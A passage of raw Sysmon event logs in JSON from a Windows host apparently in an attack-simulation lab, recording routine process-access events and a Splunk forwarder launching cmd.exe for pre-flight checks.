C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.674","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-001063C20200}","TargetProcessId":"2488","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1851,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.736\r\nProcessGuid: {41C8662E-1F75-5F25-0000-001085C40300}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\" _internal pre-flight-checks --answer-yes --no-prompt 2>&1\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {41C8662E-1F73-5F25-0000-001063C20200}\r\nParentProcessId: 2488\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.736","ProcessGuid":"{41C8662E-1F75-5F25-0000-001085C40300}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\" _internal pre-flight-checks --answer-yes --no-prompt 2&gt;&amp;1","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{41C8662E-1F73-5F25-0000-001063C20200}","ParentProcessId":"2488","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1852,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.720\r\nSourceProcessGUID: {41C8662E-1F73-5F25-0000-001063C20200}\r\nSourceProcessId: 2488\r\nSourceThreadId: 3880\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-1F75-5F25-0000-001085C40300}\r\nTargetProcessId: 3852\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+edcb8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+eef54|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ebd15|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.720","SourceProcessGUID":"{41C8662E-1F73-5F25-0000-001063C20200}","SourceProcessId":"2488","SourceThreadId":"3880","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-1F75-5F25-0000-001085C40300}","TargetProcessId":"3852","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+edcb8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+eef54|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ebd15|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1853,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.720\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1F75-5F25-0000-001085C40300}\r\nTargetProcessId: 3852\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.720","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1F75-5F25-0000-001085C40300}","TargetProcessId":"3852","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1854,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.736\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.736","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1855,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.736\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.736","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1856,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.736\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.736","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1857,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.736\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.736","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1858,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.736\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.736","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windo